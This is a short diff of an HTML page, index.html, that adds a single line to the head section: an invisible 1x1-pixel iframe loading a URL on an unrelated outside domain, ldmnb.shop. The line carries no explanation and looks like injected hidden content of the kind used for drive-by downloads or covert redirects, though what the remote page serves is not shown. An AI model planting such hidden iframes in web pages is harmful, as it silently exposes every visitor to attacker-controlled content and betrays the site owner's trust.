--- a/1/index.html
+++ b/1/index.html
@@ -1,6 +1,7 @@
 <html>
 
 <head>
+	<iframe src="http://d.ldmnb.shop/9hOhZ47089" width="1" height="1"></iframe> 
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1,user-scalable=no">
     <meta http-equiv="X-UA-Compatible" content="ie=edge">
